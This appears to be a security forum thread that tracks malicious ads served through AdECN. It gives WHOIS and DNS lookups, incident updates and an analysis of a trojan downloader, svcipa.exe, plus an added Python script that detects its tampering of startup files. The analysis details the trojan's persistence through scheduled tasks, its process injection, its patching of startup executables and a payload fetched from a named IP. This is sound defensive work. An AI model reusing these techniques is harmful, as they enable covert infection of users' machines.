Redmond, WA 98052
US

Domain name: ADECN.COM

Administrative Contact:
Administrator, Domain DOMAINS@MICROSOFT.COM
One Microsoft Way
Redmond, WA 98052
US
+1.4258828080
Technical Contact:
Hostmaster, MSN msnhst@microsoft.com
One Microsoft Way
Redmond, WA 98052
US
+1.4258828080


Registration Service Provider:
DBMS VeriSign, dbms-support@verisign.com
800-579-2848 x4
Please contact DBMS VeriSign for domain updates, DNS/Nameserver
changes, and general domain support questions.


Registrar of Record: TUCOWS, INC.
Record last updated on 12-Dec-2007.
Record expires on 29-Nov-2010.
Record created on 29-Nov-1999.

Registrar Domain Name Help Center:
http://domainhelp.tucows.com

Domain servers in listed order:
NS2.MSFT.NET
NS4.MSFT.NET
NS1.MSFT.NET
NS5.MSFT.NET
NS3.MSFT.NET


Domain status: clientTransferProhibited
clientUpdateProhibited

The Data in the Tucows Registrar WHOIS database is provided to you by Tucows
for information purposes only, and may be used to assist you in obtaining
information about or related to a domain name's registration record.

Tucows makes this information available "as is," and does not guarantee its
accuracy.

By submitting a WHOIS query, you agree that you will use this data only for
lawful purposes and that, under no circumstances will you use this data to:
a) allow, enable, or otherwise support the transmission by e-mail,
telephone, or facsimile of mass, unsolicited, commercial advertising or
solicitations to entities other than the data recipient's own existing
customers; or (b) enable high volume, automated, electronic processes that
send queries or data to the systems of any Registry Operator or
ICANN-Accredited registrar, except as reasonably necessary to register
domain names or modify existing registrations.

The compilation, repackaging, dissemination or other use of this Data is
expressly prohibited without the prior written consent of Tucows.

Tucows reserves the right to terminate your access to the Tucows WHOIS
database in its sole discretion, including without limitation, for excessive
querying of the WHOIS database or for failure to otherwise abide by this
policy.

Tucows reserves the right to modify these terms at any time.

By submitting this query, you agree to abide by these terms.

NOTE: THE WHOIS DATABASE IS A CONTACT DATABASE ONLY. LACK OF A DOMAIN
RECORD DOES NOT SIGNIFY DOMAIN AVAILABILITY.

Network Whois record
Queried whois.arin.net with "209.10.222.100"...

OrgName: Globix Corporation
OrgID: GLBX
Address: 95 Christopher Colombus Dr.
City: Jersey City
StateProv: NJ
PostalCode: 07302
Country: US

NetRange: 209.10.0.0 - 209.10.255.255
CIDR: 209.10.0.0/16
OriginAS: AS4513
NetName: GLOBIXBLK3
NetHandle: NET-209-10-0-0-1
Parent: NET-209-0-0-0-0
NetType: Direct Allocation
NameServer: ANS1.JCY1.QUALITYTECH.COM
NameServer: ANS1.NYC16.QUALITYTECH.COM
NameServer: ANS1.SJC1.QUALITYTECH.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1999-03-16
Updated: 2007-09-18

RAbuseHandle: ABUSE1735-ARIN
RAbuseName: Abuse
RAbusePhone: +1-866-239-5000
RAbuseEmail: abuse@qualitytech.com

RNOCHandle: GLOBI-ARIN
RNOCName: Globix Support
RNOCPhone: +1-212-625-7777
RNOCEmail: support@globix.net

RTechHandle: SWIPP1-ARIN
RTechName: Swipper
RTechPhone: +1-212-625-7777
RTechEmail: swipper@globix.net

RTechHandle: GCH2-ARIN
RTechName: Globix Corporation Hostmaster
RTechPhone: +1-212-334-8500
RTechEmail: arin-admin@globix.net

OrgAbuseHandle: ABUSE1735-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-866-239-5000
OrgAbuseEmail: abuse@qualitytech.com

OrgNOCHandle: GLOBI-ARIN
OrgNOCName: Globix Support
OrgNOCPhone: +1-212-625-7777
OrgNOCEmail: support@globix.net

OrgTechHandle: GCH2-ARIN
OrgTechName: Globix Corporation Hostmaster
OrgTechPhone: +1-212-334-8500
OrgTechEmail: arin-admin@globix.net

OrgTechHandle: SWIPP1-ARIN
OrgTechName: Swipper
OrgTechPhone: +1-212-625-7777
OrgTechEmail: swipper@globix.net

# ARIN WHOIS database, last updated 2008-01-29 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

DNS records
DNS query for 100.96-28.222.10.209.in-addr.arpa returned an error from the server: NameError

name class type data time to live
ad2.adecn.com IN A 209.10.222.100 741s (00:12:21)
adecn.com IN A 209.10.222.113 1800s (00:30:00)
adecn.com IN NS ns3.msft.net 172800s (2.00:00:00)
adecn.com IN NS ns4.msft.net 172800s (2.00:00:00)
adecn.com IN NS ns1.msft.net 172800s (2.00:00:00)
adecn.com IN NS ns5.msft.net 172800s (2.00:00:00)
adecn.com IN NS ns2.msft.net 172800s (2.00:00:00)
adecn.com IN SOA server: ns1.msft.net
email: msnhst.microsoft.com
serial: 2008011401
refresh: 1800
retry: 900
expire: 2419200
minimum ttl: 3600
86400s (1.00:00:00)
adecn.com IN MX preference: 10
exchange: maila.microsoft.com
900s (00:15:00)
adecn.com IN MX preference: 10
exchange: mailb.microsoft.com
900s (00:15:00)
adecn.com IN MX preference: 10
exchange: mailc.microsoft.com
900s (00:15:00)
100.222.10.209.in-addr.arpa IN CNAME 100.96-28.222.10.209.in-addr.arpa 13320s (03:42:00)
______________________________

www.axill.com

QUOTE
Address lookup
canonical name axill.com.
aliases www.axill.com

addresses 72.3.140.229

Domain Whois record
Queried whois.internic.net with "dom axill.com"...

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: AXILL.COM
Registrar: DSTR ACQUISITION VII, LLC
Whois Server: whois.dotregistrar.com
Referral URL: http://www.dotregistrar.com
Name Server: NS2.RACKSPACE.COM
Name Server: NS.RACKSPACE.COM
Status: clientTransferProhibited
Status: clientUpdateProhibited
Status: clientDeleteProhibited
Updated Date: 07-nov-2007
Creation Date: 20-sep-2004
Expiration Date: 20-sep-2012

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Queried whois.dotregistrar.com with "axill.com"...

The information in this whois database is provided for the sole
purpose of assisting you in obtaining information about domain
name registration records. This information is available "as is,"
and we do not guarantee its accuracy. By submitting a whois
query, you agree that you will use this data only for lawful
purposes and that, under no circumstances will you use this data
to: (1) enable high volume, automated, electronic processes that
stress or load this whois database system providing you this
information; or (2) allow,enable, or otherwise support the
transmission of mass, unsolicited, commercial advertising or
solicitations via facsimile, electronic mail, or by telephone to
entitites other than your own existing customers. The
compilation, repackaging, dissemination or other use of this data
is expressly prohibited without prior written consent from this
company. We reserve the right to modify these terms at any
time. By submitting an inquiry, you agree to these terms of usage
and limitations of warranty. Please limit your queries to 10 per
minute and one connection.

Registrant:
Axill Inc
50 Cragwood Road
Suite 210
Southplain Field,, Southplain Field, NJ 07080
Usa

Registrar: DOTREGISTRAR
Domain Name: AXILL.COM
Created on: 20-SEP-04
Expires on: 20-SEP-12
Last Updated on: 30-OCT-07

Administrative Contact:
Inc, Axill avilash1@hotmail.com
50 Cragwood Road
Suite 210
Southplain Field,, Southplain Field, NJ 07080
Usa
+91.7324159233
+91.9087048883

Technical Contact:
Inc, Axill avilashd@hotmail.com
50 Cragwood Road
Suite 210
Southplain Field,, Southplain Field, NJ 07080
Usa
+91.4023553771


Domain servers in listed order:
NS.RACKSPACE.COM
NS2.RACKSPACE.COM

End of Whois Information

Network Whois record
Queried whois.arin.net with "!NET-72-3-140-224-1"...

CustName: Axill
Address: 50 Cragwood Road, Suite 210
City: South Plainfield
StateProv: NJ
PostalCode: 07080
Country: US
RegDate: 2005-02-12
Updated: 2005-02-12

NetRange: 72.3.140.224 - 72.3.140.231
CIDR: 72.3.140.224/29
NetName: RSPC-60183-1108197622
NetHandle: NET-72-3-140-224-1
Parent: NET-72-3-128-0-1
NetType: Reassigned
Comment:
RegDate: 2005-02-12
Updated: 2005-02-12

RAbuseHandle: ABUSE45-ARIN
RAbuseName: Abuse Desk
RAbusePhone: +1-210-892-4000
RAbuseEmail: abuse@rackspace.com

RTechHandle: IPADM17-ARIN
RTechName: IPADMIN
RTechPhone: +1-210-892-4000
RTechEmail: ipadmin@rackspace.com

OrgAbuseHandle: ABUSE45-ARIN
OrgAbuseName: Abuse Desk
OrgAbusePhone: +1-210-892-4000
OrgAbuseEmail: abuse@rackspace.com

OrgTechHandle: IPADM17-ARIN
OrgTechName: IPADMIN
OrgTechPhone: +1-210-892-4000
OrgTechEmail: ipadmin@rackspace.com

OrgTechHandle: ZR9-ARIN
OrgTechName: Rackspace, com
OrgTechPhone: +1-210-892-4000
OrgTechEmail: hostmaster@rackspace.com

# ARIN WHOIS database, last updated 2008-01-29 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

DNS records
DNS query for 229.140.3.72.in-addr.arpa returned an error from the server: NameError

name class type data time to live
www.axill.com IN CNAME axill.com 12724s (03:32:04)
axill.com IN SOA server: ns.rackspace.com
email: hostmaster.rackspace.com
serial: 2007122606
refresh: 10800
retry: 3600
expire: 604800
minimum ttl: 300
300s (00:05:00)
axill.com IN NS ns.rackspace.com 86400s (1.00:00:00)
axill.com IN NS ns2.rackspace.com 86400s (1.00:00:00)
axill.com IN MX preference: 10
exchange: email.axill.com
86400s (1.00:00:00)
axill.com IN TXT v=spf1 ip4:84.45.70.0/24 mx ~all 86400s (1.00:00:00)
axill.com IN A 72.3.140.229 86400s (1.00:00:00)
References:

http://www.robtex.com/dns/www.axill.com.html
http://serversniff.net/asreport-41813.html
http://serversniff.net/asreport-15395.html
http://serversniff.net/asreport-33070.html
http://serversniff.net/nsr-axill.com
http://serversniff.net/asreport-153952735733070.html
______________________________

194.126.193.157

QUOTE
Address lookup
canonical name hosted-by.adulteuhost.com.
aliases
addresses 194.126.193.157

Domain Whois record
Queried whois.internic.net with "dom adulteuhost.com"...

Whois Server Version 1.3

Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.

Domain Name: ADULTEUHOST.COM
Registrar: ENOM, INC.
Whois Server: whois.enom.com
Referral URL: http://www.enom.com
Name Server: DNS1.ADULTEUHOST.COM
Name Server: DNS2.ADULTEUHOST.COM
Name Server: DNS3.ADULTEUHOST.COM
Status: clientTransferProhibited
Status: clientDeleteProhibited
Updated Date: 01-aug-2007
Creation Date: 20-aug-2005
Expiration Date: 20-aug-2008

The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.

Queried whois.enom.com with "adulteuhost.com"...

=-=-=-=
Visit AboutUs.org for more information about adulteuhost.com
<a href="http://www.aboutus.org/adulteuhost.com">AboutUs: adulteuhost.com</a>

Registration Service Provided By: InterXS
Contact: admin@interxs.nl
Visit: http://www.interxs.nl

Domain name: adulteuhost.com

Registrant Contact:
AdultEUhost.com
Domain Services (noc@adulteuhost.com)
+31.206138807
Fax: +31.
PO BOX 20646
Amsterdam, NOORD-HOLLAND 1001 NP
NL

Administrative Contact:
AdultEUhost.com
Domain Services (noc@adulteuhost.com)
+31.206138807
Fax: +31.
PO BOX 20646
Amsterdam, NOORD-HOLLAND 1001 NP
NL

Technical Contact:
AdultEUhost.com
Domain Services (noc@adulteuhost.com)
+31.206138807
Fax: +31.
PO BOX 20646
Amsterdam, NOORD-HOLLAND 1001 NP
NL

Status: Locked

Name Servers:
dns1.adulteuhost.com
dns2.adulteuhost.com
dns3.adulteuhost.com

Creation date: 21 Aug 2005 00:37:17
Expiration date: 21 Aug 2008 00:37:17
=-=-=-=
The data in this whois database is provided to you for information
purposes only, that is, to assist you in obtaining information about or
related to a domain name registration record. We make this information
available "as is," and do not guarantee its accuracy. By submitting a
whois query, you agree that you will use this data only for lawful
purposes and that, under no circumstances will you use this data to: (1)
enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or (2) allow,
enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic
mail, or by telephone. The compilation, repackaging, dissemination or
other use of this data is expressly prohibited without prior written
consent from us.

We reserve the right to modify these terms at any time. By submitting
this query, you agree to abide by these terms.
Version 6.3 4/3/2002

Network Whois record
Queried whois.ripe.net with "-B 194.126.193.157"...

% This is the RIPE Whois query server #2.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Information related to '194.126.193.0 - 194.126.193.255'

inetnum: 194.126.193.0 - 194.126.193.255
netname: EASYCARRIER-IPv4-5
descr: AdultEUhosting IPv4 Assignment #3
country: NL
org: ORG-eCB2-RIPE
admin-c: eCN3-RIPE
tech-c: eCN3-RIPE
status: ASSIGNED PI
notify: noc@easycarrier.net
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-by: EASYCARRIER-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-routes: EASYCARRIER-MNT
mnt-domains: EASYCARRIER-MNT
changed: hostmaster@ripe.net 20050128
changed: hostmaster@ripe.net 20051014
changed: noc@easycarrier.net 20060101
source: RIPE

organisation: ORG-eCB2-RIPE
org-name: easyCarrier Communications B.V.
org-type: OTHER
address: Gyroscoopweg 2F
e-mail: noc@easycarrier.net
mnt-ref: EASYCARRIER-MNT
mnt-by: EASYCARRIER-MNT
changed: noc@globaleurope.net 20040126
changed: ripe-dbm@ripe.net 20070102
source: RIPE

role: easyCarrier Communications NOC
address: Gyroscoopweg 2E & 2F
e-mail: noc@easycarrier.net
admin-c: LC1910-RIPE
tech-c: LC1910-RIPE
nic-hdl: eCN3-RIPE
changed: noc@easycarrier.net 20040126
source: RIPE

% Information related to '194.126.193.0/24AS30913'

route: 194.126.193.0/24
descr: Route to InterXS IP Network
origin: AS30913
mnt-by: INTERXS-MNT
source: RIPE
changed: noc@adulteuhost.com 20051013

DNS records
DNS query for hosted-by.adulteuhost.com returned an error from the server: NameError

name class type data time to live
adulteuhost.com IN A 194.116.146.5 3600s (01:00:00)
adulteuhost.com IN SOA server: dns1.adulteuhost.com
email: hostmaster.interxs.nl
serial: 2006102800
refresh: 14400
retry: 3600
expire: 604800
minimum ttl: 3600
3600s (01:00:00)
adulteuhost.com IN NS dns2.adulteuhost.com 3600s (01:00:00)
adulteuhost.com IN MX preference: 10
exchange: mail.adulteuhost.com
3600s (01:00:00)
adulteuhost.com IN NS dns3.adulteuhost.com 3600s (01:00:00)
adulteuhost.com IN NS dns1.adulteuhost.com 3600s (01:00:00)
157.193.126.194.in-addr.arpa IN PTR hosted-by.adulteuhost.com 3600s (01:00:00)
References:
http://serversniff.net/asreport-194.126.193.157.html
Kimberly
I’m pleased to announce that AdECN took the necessary steps in order to fix the issue. I’ve checked back the site where I did encounter the adverts and no more banners from 199.202.248.50 are displayed.

199.202.248.50 is still up and running, so don't visit the links and watch out while surfing as you might encounter them elsewhere.
Kimberly
I had a rather unpleasant surprise tonight when quickly visiting the website … … the advertisement is active again. Unfortunately I didn’t have Ethereal running but I was able to save the firewall web history log, the ProcessGuard alert and the banner as seen below. Sorry for the large firewall capture, but it's the only way to show the full link without getting cut off.
Furthermore .... although I have 2 submission tickets for 199.202.248.50, Verizon did choose to remain silent also …

Update - 5th February 2008.

I immediately did report the incident and during the night it was fixed by AdECN.


Note: Initially posted on 4th February 2008 11:49 PM
Kimberly
Not related to the advert itself but I stumbled on a similar file today while checking some websites.

<h4>
File details
</h4>
Filename: svcipa.exe

File size: 23616 bytes
MD5: ef1f0ae41e71c5a6997a0bee743416bb
SHA1: d3bbc62f8db9a317febd066c21587704df9f2424
PEiD: -
packers: UPX
QUOTE
File svcipa.exe received on 02.27.2008 17:49:56 (CET)
AhnLab-V3 2008.2.27.0 2008.02.27 Win-Trojan/Xema.variant
AntiVir 7.6.0.67 2008.02.27 TR/Crypt.ULPM.Gen
Authentium 4.93.8 2008.02.27 -
Avast 4.7.1098.0 2008.02.27 -
AVG 7.5.0.516 2008.02.27 -
BitDefender 7.2 2008.02.27 GenPack:Generic.Malware.Sdld.AA242CF4
CAT-QuickHeal 9.50 2008.02.26 -
ClamAV 0.92.1 2008.02.27 -
DrWeb 4.44.0.09170 2008.02.27 -
eSafe 7.0.15.0 2008.02.26 suspicious Trojan/Worm
eTrust-Vet 31.3.5567 2008.02.27 -
Ewido 4.0 2008.02.27 -
FileAdvisor 1 2008.02.27 -
Fortinet 3.14.0.0 2008.02.27 -
F-Prot 4.4.2.54 2008.02.26 W32/Heuristic-USU!Eldorado
F-Secure 6.70.13260.0 2008.02.27 Trojan-Downloader.Win32.Firu.bp
Ikarus T3.1.1.20 2008.02.27 Win32.SuspectCrc
Kaspersky 7.0.0.125 2008.02.27 Trojan-Downloader.Win32.Firu.bp
McAfee 5238 2008.02.26 -
Microsoft 1.3301 2008.02.27 Trojan:Win32/Bohmini.A
NOD32v2 2906 2008.02.27 -
Norman 5.80.02 2008.02.26 -
Panda 9.0.0.4 2008.02.27 Suspicious file
Prevx1 V2 2008.02.27 -
Rising 20.33.22.00 2008.02.27 -
Sophos 4.27.0 2008.02.27 Mal/HckPk-A
Sunbelt 3.0.893.0 2008.02.23 -
Symantec 10 2008.02.27 -
TheHacker 6.2.9.229 2008.02.25 -
VBA32 3.12.6.2 2008.02.27 -
VirusBuster 4.3.26:9 2008.02.27 -
Webwasher-Gateway 6.6.2 2008.02.27 Trojan.Crypt.ULPM.Gen
<h4>
Technical details
</h4>
Registry changes.
  • Adds the following Values.
    QUOTE
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent "LastTaskRun"
    Type: REG_BINARY
    Data: D8, 07, 02, 00, 03, 00, 1B, 00, 11, 00, 00, 00, 01, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Schedule "AtTaskMaxHours"
    Type: REG_DWORD
    Data: 48, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule "AtTaskMaxHours"
    Type: REG_DWORD
    Data: 48, 00, 00, 00
  • Deletes the following values.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Schedule "DisplayName"
    Type: REG_SZ
    Data: Task Scheduler
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule "DisplayName"
    Type: REG_SZ
    Data: Task Scheduler
  • Modifies the following values.
    QUOTE
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Schedule "NextAtJobId"
    Old type: REG_DWORD
    New type: REG_DWORD
    Old data: 01, 00, 00, 00
    New data: 19, 00, 00, 00
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule "NextAtJobId"
    Old type: REG_DWORD
    New type: REG_DWORD
    Old data: 01, 00, 00, 00
    New data: 19, 00, 00, 00
Files added.
QUOTE
c:\bold.log
Date: 2/27/2008 5:00 PM
Size: 3,010 bytes
%Temp%\1Ll5OSVH.hdi
Date: 2/27/2008 5:00 PM
Size: 0 bytes
%System%\[RANDOM NAME].exe
Date: 2/27/2008 4:58 PM
Size: 23,616 bytes

c:\WINDOWS\Tasks\At1.job
Date: 1/30/2008 1:06 AM
Size: 350 bytes

up to

c:\WINDOWS\Tasks\At24.job
Date: 1/30/2008 1:06 AM
Size: 350 bytes
Note: %Temp% is a variable that refers to the temporary folder in the short path form. By default, this is C:\Documents and Settings\[UserName]\Local Settings\Temp\ (Windows NT/2000/XP).
%System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).


<h4>
Notes
</h4>
Same initial behavior as jfidoj1.exe.
  • Copies itself to the %System% folder under a random name, SR5166N7.exe.exe in our analysis.
  • Tries to inject itself in most running processes (writes to the virtual memory) and creates different mutexes to mark its presence on the system. Processes that have been modified try to inject code into new processes too.
  • One or more of the hooked processes connect to the internet and browser.php is requested from 194.126.193.157. This is actually an executable and it will be run on the computer by one of the "infected" processes.
    Analysis: <a href="http://www.virustotal.com/analisis/5490b7afb56f56ede0bbcb776a173d43" target="_blank">http://www.virustotal.com/analisis/5490b7a...0bbcb776a173d43</a>
  • Since 24 scheduled tasks are created, the program gets loaded every hour and every day (even after a reboot or shutdown). The tasks have been created under the SYSTEM account.
Now comes the new & interesting part ... we notice that some files have been backed up.

QUOTE
c:\Program Files\Common Files\Symantec Shared\ccApp.ex_
Date: 9/14/2002 7:21 PM
Size: 54,976 bytes
c:\Program Files\Common Files\Symantec Shared\ccRegVfy.ex_
Date: 9/14/2002 7:22 PM
Size: 38,592 bytes
c:\Program Files\Virtual Machine Additions\vmusrvc.ex_
Date: 1/26/2007 7:09 AM
Size: 112,008 bytes
If you run a HijackThis log, you will see that they are part of the programs loaded at Windows startup.

QUOTE
O4 - HKLM\..\Run: [VMUserServices] C:\Program Files\Virtual Machine Additions\vmusrvc.exe
O4 - HKLM\..\Run: [ccApp] C:\Program Files\Common Files\Symantec Shared\ccApp.exe
O4 - HKLM\..\Run: [ccRegVfy] C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe
O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"
O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize
They have been modified by the infection.

QUOTE
c:\Program Files\Common Files\Symantec Shared\ccApp.exe
Old date: 9/14/2002 7:21 PM
New date: 9/14/2002 7:21 PM
Old size: 54,976 bytes
New size: 63,168 bytes
c:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe
Old date: 9/14/2002 7:22 PM
New date: 9/14/2002 7:22 PM
Old size: 38,592 bytes
New size: 46,784 bytes
c:\Program Files\Virtual Machine Additions\vmusrvc.exe
Old date: 1/26/2007 7:09 AM
New date: 1/26/2007 7:09 AM
Old size: 112,008 bytes
New size: 120,200 bytes
A hex editor reveals that several parts have been replaced but the one below is the most interesting. We notice the presence of shell32.dll ShellExecuteA C:\WINDOWS\system32\SR5166N7.exe which is an additional loading point to ensure that the malware will run even if the scheduled tasks don't run.

The infection also kept a log of what it did perform during initial install.

CODE
1928 (c:\windows\temp\svcipa.exe): bold_shm_init() enter
1928 (c:\windows\temp\svcipa.exe): Start_TS_Service() enter
1928 (c:\windows\temp\svcipa.exe): Start_TS_Service() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Job_Add() enter
1928 (c:\windows\temp\svcipa.exe): Job_Add() exit
1928 (c:\windows\temp\svcipa.exe): Infect_Startup enter
1928 (c:\windows\temp\svcipa.exe): Infect Startup exit
820 (C:\WINDOWS\system32\SR5166N7.exe): bold_shm_init() enter
820 (C:\WINDOWS\system32\SR5166N7.exe): InsertID enter
820 (C:\WINDOWS\system32\SR5166N7.exe): InsertID exit
820 (C:\WINDOWS\system32\SR5166N7.exe): bold_shm_init() exit
820 (C:\WINDOWS\system32\SR5166N7.exe): bold_shm_init() returned 1
736 (C:\WINDOWS\system32\SR5166N7.exe): bold_shm_init() enter
736 (C:\WINDOWS\system32\SR5166N7.exe): bold_shm_init() returned 0
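An added example (not code from the post, and not the malware's) that turns the observation above into a check: for every HijackThis O4 entry it looks for the .ex_ sibling, compares sizes and timestamps, and reports whether all patched files grew by the same amount. The O4 lines and the six Symantec/Virtual Machine Additions file records are the post's own figures; the two ProcessGuard file records are constructed as clean controls.

```python
"""Check for the startup-file tampering the post describes: each Run-key executable
is backed up as a sibling with extension .ex_ and then overwritten by a larger copy
whose timestamp matches the backup. The O4 lines and the six Symantec/VM file
records below are the post's figures; the two ProcessGuard records are constructed
clean controls."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class FileInfo:
    path: str
    size: int
    mtime: str  # kept as the listing's string; compared only for equality


# HijackThis O4 lines quoted in the post.
O4_LINES = [
    r"O4 - HKLM\..\Run: [VMUserServices] C:\Program Files\Virtual Machine Additions\vmusrvc.exe",
    r"O4 - HKLM\..\Run: [ccApp] C:\Program Files\Common Files\Symantec Shared\ccApp.exe",
    r"O4 - HKLM\..\Run: [ccRegVfy] C:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe",
    r'O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"',
    r'O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize',
]

# File inventory after infection (post's figures; ProcessGuard entries constructed).
FILES = [
    FileInfo(r"c:\Program Files\Common Files\Symantec Shared\ccApp.exe", 63168, "9/14/2002 7:21 PM"),
    FileInfo(r"c:\Program Files\Common Files\Symantec Shared\ccApp.ex_", 54976, "9/14/2002 7:21 PM"),
    FileInfo(r"c:\Program Files\Common Files\Symantec Shared\ccRegVfy.exe", 46784, "9/14/2002 7:22 PM"),
    FileInfo(r"c:\Program Files\Common Files\Symantec Shared\ccRegVfy.ex_", 38592, "9/14/2002 7:22 PM"),
    FileInfo(r"c:\Program Files\Virtual Machine Additions\vmusrvc.exe", 120200, "1/26/2007 7:09 AM"),
    FileInfo(r"c:\Program Files\Virtual Machine Additions\vmusrvc.ex_", 112008, "1/26/2007 7:09 AM"),
    FileInfo(r"c:\Program Files\ProcessGuard\pgaccount.exe", 81920, "3/3/2007 10:00 AM"),     # constructed
    FileInfo(r"c:\Program Files\ProcessGuard\procguard.exe", 1269760, "3/3/2007 10:00 AM"),  # constructed
]
INVENTORY = {f.path.lower(): f for f in FILES}  # Windows paths compare case-insensitively

_O4_RE = re.compile(r"^O4 - (HK\w+)\\\.\.\\Run: \[([^\]]+)\] (.*)$")


def parse_o4(line):
    """Return (entry name, executable path) for a HijackThis O4 line, or None."""
    m = _O4_RE.match(line.strip())
    if not m:
        return None
    cmd = m.group(3).strip()
    if cmd.startswith('"'):                 # quoted path, arguments may follow
        path = cmd[1:cmd.index('"', 1)]
    else:                                   # unquoted: the path ends at ".exe"
        end = cmd.lower().find(".exe")
        path = cmd[: end + 4] if end >= 0 else cmd
    return m.group(2), path


def backup_name(path):
    """The backup naming the post shows: ccApp.exe -> ccApp.ex_ (None for non-.exe)."""
    if not path.lower().endswith(".exe"):
        return None
    return path[:-1] + "_"


def find_patched_startup_entries(o4_lines, inventory):
    """Flag Run entries whose .ex_ sibling exists, is smaller, and carries the same timestamp."""
    hits = []
    for line in o4_lines:
        parsed = parse_o4(line)
        if parsed is None:
            continue
        name, path = parsed
        exe = inventory.get(path.lower())
        bak_path = backup_name(path)
        bak = inventory.get(bak_path.lower()) if bak_path else None
        if exe is None or bak is None:
            continue
        # Same date on original and patched copy means the timestamp was preserved on purpose.
        if exe.size > bak.size and exe.mtime == bak.mtime:
            hits.append({"entry": name, "path": path, "backup": bak.path,
                         "delta": exe.size - bak.size})
    return hits


def common_growth(hits):
    """If every patched file grew by the same amount, return it (one shared appended stub)."""
    deltas = {h["delta"] for h in hits}
    return deltas.pop() if len(deltas) == 1 else None


if __name__ == "__main__":
    found = find_patched_startup_entries(O4_LINES, INVENTORY)
    for h in found:
        print(f"{h['entry']:16} +{h['delta']} bytes  backup: {h['backup']}")
    print("common growth:", common_growth(found))
```

On the post's figures all three patched files grew by exactly 8,192 bytes, which is the kind of constant a file-integrity alert can key on alongside the .ex_ sibling.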
Kimberly
<h4>
Extra reading
</h4>

By Nicolas Brulez, 'Security Researcher' at Websense.
Kimberly
<h4>
jfidoj.exe - 247mediadirect.com - 194.126.193.160
</h4>
The infection comes now from 247mediadirect.com - 194.126.193.160.

Website Title: None given.
